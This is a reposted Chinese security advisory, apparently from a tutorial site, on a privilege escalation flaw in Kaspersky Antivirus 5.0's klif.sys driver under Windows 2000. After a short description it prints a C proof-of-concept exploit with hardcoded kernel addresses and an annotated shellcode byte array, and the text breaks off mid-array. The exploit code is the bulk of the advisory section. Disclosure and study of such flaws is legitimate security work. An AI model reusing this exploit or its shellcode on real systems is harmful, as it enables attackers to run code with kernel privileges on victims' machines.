当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > Kaspersky杀毒软件klif.sys权限提升漏洞

安全基础
Windows防非法用户入侵技巧
三招两式抵制IE顽固病毒
防御DDoS攻击的实时监测模型
简单分析Script脚本跨站攻击漏洞技术
网络安全专家支招防范黑客攻击九大方法
2007年度网络安全分析报告
如何让你的U盘做到100%预防电脑病毒
三招两式抵制IE的顽固病毒
黑客发起“瞬时攻击“的危险性
网上常见的网络陷阱 网友来看
2007网络安全焦点:终端Web安全
用十大安全策略加固无线局域网安全
小心美丽圣诞树的背后藏有恶毒的蛇
追踪网络攻击 简单方法查找黑客老巢
解读身份认证技术现实化
证券期货系统网络安全完美解决方案
最好的虚拟主机安全配置方法
Windows系统用户摆脱黑客攻击的方法
计算机病毒防治常遇问题
加固Wi-Fi无线网络安全的17招式(上)

安全基础 中的 Kaspersky杀毒软件klif.sys权限提升漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 33 ::
收藏到网摘: n/a

受影响系统:
Kaspersky Labs Kaspersky Antivirus 5.0.335
Kaspersky Labs Kaspersky Antivirus 5.0.228
Kaspersky Labs Kaspersky Antivirus 5.0.227
描述:
------------------------------------------
BUGTRAQ  ID: _blank>13878

Kaspersky是一款非常流行的杀毒软件。

Microsoft Windows 2000平台的Kaspersky软件设计上存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。

起因是Kaspersky内核驱动klif.sys没有正确丢弃高权限,攻击者可能利用这个漏洞以系统内核的权限执行任意代码。

<*来源:Ilya Rabinovich ([email protected]
  
  链接:_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2
*>

测试方法:
------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

//(C) by Ilya Rabinovich.

#include <windows.h>

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;

PDWORD pJmpAddress=(PDWORD)0xBE9372B0;

PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};

PUCHAR pKAVRet;


unsigned char code[]={0x68,0x00,0x02,0x00,0x00,    //push 0x200
                    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address> - 0xBE938000
                    0x6A,0x00,                    //push 0  
                    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<GetModuleFileNameA> -> +13
                    0xFF,0xD0,                    //call eax
                    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address>
                    0x68,0x00,0x82,0x93,0xBE,    //push <address of the notepad path>- 0xBE938200
                    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<lstrcmpiA> -> +30
                    0xFF,0xD0,                    //call eax
                    0x85,0xC0,                    //test eax,eax
                    0x74,0x03,                    //je +03
                    0xC2,0x04,0x00,                //retn 4
                    0x6A,0x00,                    //pu